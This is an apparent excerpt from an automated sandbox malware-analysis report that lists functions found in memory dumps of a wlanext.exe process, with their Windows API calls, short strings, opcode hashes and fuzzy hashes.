                                            • RtlNtStatusToDosError.NTDLL ref: 00FEF917
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Error$Lastmemcpy$Status
                                            • String ID:
                                            • API String ID: 3124673191-0
                                            • Opcode ID: 919e4d658d883932da5587241ea444c587a0cb8db1ba8c6083198de8824e591e
                                            • Instruction ID: d070fbce1095c07228b9dc60fbb0e70caca6b65dbeeb850ed931c66a8199c844
                                            • Opcode Fuzzy Hash: 919e4d658d883932da5587241ea444c587a0cb8db1ba8c6083198de8824e591e
                                            • Instruction Fuzzy Hash: EF31E47290021AABDB00DF59DC81BAEB7B4FF40320F11412AE965E7242D734EE14DBD0
                                            Function 00FEF5B0 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00FEF936: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000057,?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF944
                                            • memset.MSVCRT ref: 00FEF5F5
                                            • memcpy.MSVCRT ref: 00FEF649
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,-00000030,00000000,00000004,00000000,?,?,00000000,00000000,00000000), ref: 00FEF672
                                            • RtlNtStatusToDosError.NTDLL ref: 00FEF686
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Error$Last$Statusmemcpymemset
                                            • String ID:
                                            • API String ID: 1706616652-0
                                            • Opcode ID: 19aee3abbd202c46b307346320eda3b9d8d36908a9d0705f85b2dadc5bac7c78
                                            • Instruction ID: 086c513cabd32dac898de6dcdf354d933d75a60fa6c48efe959ab935f1e126f9
                                            • Opcode Fuzzy Hash: 19aee3abbd202c46b307346320eda3b9d8d36908a9d0705f85b2dadc5bac7c78
                                            • Instruction Fuzzy Hash: AF316B75A00616AFCB10DF69C880B6ABBF8FF48320F1441A9E908EB351E734E915DBD0
                                            Function 00FEF4CF Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00FEF936: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000057,?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF944
                                            • memset.MSVCRT ref: 00FEF50E
                                            • memcpy.MSVCRT ref: 00FEF559
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000004,00000000,-00000014,?,00000000,00000000), ref: 00FEF584
                                            • RtlNtStatusToDosError.NTDLL ref: 00FEF598
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Error$Last$Statusmemcpymemset
                                            • String ID:
                                            • API String ID: 1706616652-0
                                            • Opcode ID: 074539ab3edf5aa945e593698f77b7d91c675ef13509186e7611481e6ba1fd2f
                                            • Instruction ID: 187e60ff39abac69085a1d7dae4666e3910ef17b8749c89a3bd8d9793ff22dc7
                                            • Opcode Fuzzy Hash: 074539ab3edf5aa945e593698f77b7d91c675ef13509186e7611481e6ba1fd2f
                                            • Instruction Fuzzy Hash: 5B31A075A00305AFCB20DF69C880B6EB7F4EF58314F148469E918EB311E775E906DB90
                                            Function 00FEB645 Relevance: 6.1, APIs: 4, Instructions: 74threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000008,00000001,00000000,00000000,00000000,?,?,?,00FEB798), ref: 00FEB68B
                                            • OpenThreadToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00FEB798), ref: 00FEB692
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00FEB798), ref: 00FEB69C
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?,00FEB798), ref: 00FEB6D6
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Thread$CloseCurrentErrorHandleLastMessageOpenTokenTrace
                                            • String ID:
                                            • API String ID: 3986309575-0
                                            • Opcode ID: c3d6a728bd5a15d76efdf4f1c2502772274c4c423a02ac354d6c30d5b9064d9f
                                            • Instruction ID: a9f81df7d63bb55c154de00cc1734e466a3fe4d0c2e94d6b69f122db950d1560
                                            • Opcode Fuzzy Hash: c3d6a728bd5a15d76efdf4f1c2502772274c4c423a02ac354d6c30d5b9064d9f
                                            • Instruction Fuzzy Hash: 4C210A31600284ABDB295F16DD48B767B5BEF84354F380099F9018A2A5CB76CD42F754
                                            Function 00FEB582 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000008,00000000,00000000,00000000,00000000,?), ref: 00FEB5C6
                                            • OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000), ref: 00FEB5CD
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEB5D7
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00FEB611
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Process$CloseCurrentErrorHandleLastMessageOpenTokenTrace
                                            • String ID:
                                            • API String ID: 3604925983-0
                                            • Opcode ID: 65ca6cc8470c8a8f33bff009f68b3e66b969256781da99c72b2651c9549ff68c
                                            • Instruction ID: f55b396955a5d74e113c4db605afd37ac90cb32f30d2bab5963cefcf3cf3d1b1
                                            • Opcode Fuzzy Hash: 65ca6cc8470c8a8f33bff009f68b3e66b969256781da99c72b2651c9549ff68c
                                            • Instruction Fuzzy Hash: D821CC31600388ABDB294F569C09B777BAAEF44368F38009DF501962A5DB76CD42FB64
                                            Function 00FEF9C0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00FEFDA8: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00FEFDAF
                                            • __set_app_type.MSVCRT ref: 00FEF9D2
                                            • __p__fmode.MSVCRT ref: 00FEF9E8
                                            • __p__commode.MSVCRT ref: 00FEF9F6
                                            • __setusermatherr.MSVCRT ref: 00FEFA17
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                            • String ID:
                                            • API String ID: 1632413811-0
                                            • Opcode ID: 99acadf5dfda5119ab058d4aef124d0a0d1b31d8687b039174c745cfcfbcb996
                                            • Instruction ID: 780e8951fcf966c2413a62b345681a1250f2e121ec3fa7fc36421b7b2de6a23c
                                            • Opcode Fuzzy Hash: 99acadf5dfda5119ab058d4aef124d0a0d1b31d8687b039174c745cfcfbcb996
                                            • Instruction Fuzzy Hash: 5EF0AC7554038CDFC764AF31EC4EA383B68BF46722B200669E561862F5CF3A9489FA14
                                            Function 00FEDD04 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00FEDCE6), ref: 00FEDD11
                                            • DeleteCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FEDCE6), ref: 00FEDD21
                                            • DeleteCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FEDCE6), ref: 00FEDD32
                                            • memset.MSVCRT ref: 00FEDD3D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalDeleteSection$CloseHandlememset
                                            • String ID:
                                            • API String ID: 3880144888-0
                                            • Opcode ID: b27ca78ecdb249b5eb559d7ad4194a67289424e7e2031b904d8761df51fdc207
                                            • Instruction ID: e8cf56f74f947285f044de03ac3618087a2a281a7a07c2de8bf7b4f8660595b6
                                            • Opcode Fuzzy Hash: b27ca78ecdb249b5eb559d7ad4194a67289424e7e2031b904d8761df51fdc207
                                            • Instruction Fuzzy Hash: 0AE092728027149BC7B05B25AE48B6773FCBF51321F400419F146D6850CB74F804DA55
                                            Function 03637D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: 3942aac2583ff9d43276758a3f12e2016ad3938dae789eb1854f9ed7c4d64df2
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: A8918FB0E0021A9BDB24DE69C981AFEB7B5FF46720F18451EE865E73C0E7309941CB64
                                            Function 035F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 60f787dec27391b52784cc1d5748418c9c0ea7270457eb1cba60d976a9d7d1cf
                                            • Instruction ID: 3fa88028f9813033669f795987b1d66470458f024c359fe35adcae122278f961
                                            • Opcode Fuzzy Hash: 60f787dec27391b52784cc1d5748418c9c0ea7270457eb1cba60d976a9d7d1cf
                                            • Instruction Fuzzy Hash: 73815975D006699BDB31DF54CC44BEEB7B8AB48710F0445EAEA19B7290D7309E84CFA4
                                            Function 00FE6780 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00FE5CD6: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560), ref: 00FE5D2E
                                              • Part of subcall function 00FE5CD6: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560,?,00000000,00000000), ref: 00FE60D4
                                            • SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,?,?,?,00000000,00000000), ref: 00FE687E
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE6888
                                              • Part of subcall function 00FE5764: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,?,0000000A,?,00000004,00000000), ref: 00FE57B8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterErrorEventLastLeaveMessageTrace
                                            • String ID: InitService
                                            • API String ID: 2753720420-1647998688
                                            • Opcode ID: 0414b2defdc1531d22db67f9794c573ebbdb4b7cbf1360e135edbf01bb3fa8ac
                                            • Instruction ID: cbd2a3e7adf968be003c7ab4c8377aa9b3b3b6e655364536c7558d3a6d637e09
                                            • Opcode Fuzzy Hash: 0414b2defdc1531d22db67f9794c573ebbdb4b7cbf1360e135edbf01bb3fa8ac
                                            • Instruction Fuzzy Hash: A341E3319043899BC725DF26C840B6F7BE5EF983A4F10052DF8449B292DB35CD42EB92
                                            Function 00FEDE82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                            Download Yara Rule
                                            APIs
                                            • DeleteCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF13D0,00000183,00000000,00FF13CC,00000001,00FF13CC,?,00FE8F3B,00FF13CC,00000000,00FF1000,00FE9404,?,?,?,00FE3991), ref: 00FEDF3A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalDeleteSection
                                            • String ID: HtDestroyHandleTable$L2Ht
                                            • API String ID: 166494926-2242761165
                                            • Opcode ID: 7e1072fe9b8da4ca6ad60ecec76bfa3b61a1057036375ee147a881857a7a7a0b
                                            • Instruction ID: cb0ff26a899bdfd8210ea681c8b6fb9a00afaafb66ad8e86bb876856ca91aaf1
                                            • Opcode Fuzzy Hash: 7e1072fe9b8da4ca6ad60ecec76bfa3b61a1057036375ee147a881857a7a7a0b
                                            • Instruction Fuzzy Hash: BF218832A007819BD730CF1AD884A16B3E6FF847247244A2DD16B8BA95CB70FC45DB50
                                            Function 00FEEF12 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00FEDD48: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00FE1A24,?,00FE9CD7,00000000,?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD4F
                                              • Part of subcall function 00FEDD48: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD59
                                              • Part of subcall function 00FEDD48: ResetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD6F
                                              • Part of subcall function 00FEDD48: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD76
                                              • Part of subcall function 00FEDD48: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD7D
                                            • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,SendPacket), ref: 00FEEF7B
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEEF85
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ErrorEventFileLastResetWrite
                                            • String ID: SendPacket
                                            • API String ID: 1802692274-2548714312
                                            • Opcode ID: 9f4151c42623801b8bf25959c5511ab1e673f1f2dd1c2b7e59e94e9ea75d8f95
                                            • Instruction ID: a32091a2092f29fd7e4a802e9c4a7a459188087418dddd3c41fc250ab2344925
                                            • Opcode Fuzzy Hash: 9f4151c42623801b8bf25959c5511ab1e673f1f2dd1c2b7e59e94e9ea75d8f95
                                            • Instruction Fuzzy Hash: 2111B672D001D9EFDB22AF96ED818BEBB7AEF94360B140039E80567251CB348E11F790
                                            Function 00FEDDD1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • InitializeCriticalSectionAndSpinCount.API-MS-WIN-CORE-SYNCH-L1-1-0(?,80001000,HtCreateHandleTable,00000106,00FF13CC,00000000,00000001,0000000F,0000000F,?,00FE8E38,00FF13CC,?,00FE35F4), ref: 00FEDE15
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CountCriticalInitializeSectionSpin
                                            • String ID: HtCreateHandleTable
                                            • API String ID: 2593887523-3622291215
                                            • Opcode ID: e8efd632071f2a62f0353d59f35f2fcd0732efc946b45647dbc5ba0f75e6ec23
                                            • Instruction ID: b6557f77981b31998cd4ddc3e017e509dd4608e9163d662d8a311e5482de9050
                                            • Opcode Fuzzy Hash: e8efd632071f2a62f0353d59f35f2fcd0732efc946b45647dbc5ba0f75e6ec23
                                            • Instruction Fuzzy Hash: 6511E772A40345ABE7308F66DC49B97B7E8EF54B60F20091DB2569B5C0D7B0E904EB90
                                            Function 00FE85FD Relevance: 5.1, APIs: 4, Instructions: 89COMMON
                                            Download Yara Rule
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1540,?,00000000,00000001,00FE388F), ref: 00FE8637
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1540,?,00000000,00000001,00FE388F), ref: 00FE8648
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1540,?,00000000,00000001,00FE388F), ref: 00FE865B
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1540,?,00000000,00000001,00FE388F), ref: 00FE86DC
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$MessageTrace
                                            • String ID:
                                            • API String ID: 3323410425-0
                                            • Opcode ID: ac542b779f58a2c46ec609e6330c92516d4dcd8a90a3b0cd65504fed85c2e819
                                            • Instruction ID: 25e594f1830626010d6994a020abea75aae1f830813f7801c38b89b077c3e21d
                                            • Opcode Fuzzy Hash: ac542b779f58a2c46ec609e6330c92516d4dcd8a90a3b0cd65504fed85c2e819
                                            • Instruction Fuzzy Hash: C731D3715002C4ABD725AF169C44F267A56BF403E5F290094F50A9B2BACE76CC42FB95
                                            Function 00FEE775 Relevance: 5.0, APIs: 4, Instructions: 28COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00FEDD86: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000040,00000000,00FE9BFF,?,00000000,00000000,00FE304B,00000002,00000000,?,00000000), ref: 00FEDD8C
                                              • Part of subcall function 00FEDD86: GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00000000,00FE304B,00000002,00000000,?,00000000), ref: 00FEDD92
                                              • Part of subcall function 00FEDD86: WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,?,00000000,00000000,00FE304B,00000002,00000000,?,00000000), ref: 00FEDDA0
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00FF1000,00FEC479,0000000C,00000000,?,00FE3E0C,?,?,?,00FE3991,00001388,00001388), ref: 00FEE796
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE3E0C,?,?,?,00FE3991,00001388,00001388), ref: 00FEE7DB
                                              • Part of subcall function 00FEEE0D: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,00FE2774,00FEE7A9,?,00FE3E0C,?,?,?,00FE3991,00001388,00001388), ref: 00FEEE45
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$Leave$CurrentEnterObjectSingleThreadWait
                                            • String ID:
                                            • API String ID: 1901038851-0
                                            • Opcode ID: 6cbd46d187bb22728de14ea840d4739360d58722c4caaab9f6cb23f383249e2a
                                            • Instruction ID: dda6c13486a6a087496409dd2870a0035f4b53c08c44546de97b852005667924
                                            • Opcode Fuzzy Hash: 6cbd46d187bb22728de14ea840d4739360d58722c4caaab9f6cb23f383249e2a
                                            • Instruction Fuzzy Hash: 65F0B27A5411A8CFC366EF56FE48AB97B6EFF59B167000049E211872A5CF341880FFA5
                                            Function 00FEF936 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000057,?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF944
                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF94E
                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000008,?,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF95C
                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF96A
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ErrorHeapLast$AllocProcess
                                            • String ID:
                                            • API String ID: 4104531043-0
                                            • Opcode ID: 59f7d5979112be3c53ef2ae457312a8e3ad1ce53258d8bab09d9dbb7346aea75
                                            • Instruction ID: 80dac394698255712debd6cc4705147e6527970606d8d0898725f85d07155aa7
                                            • Opcode Fuzzy Hash: 59f7d5979112be3c53ef2ae457312a8e3ad1ce53258d8bab09d9dbb7346aea75
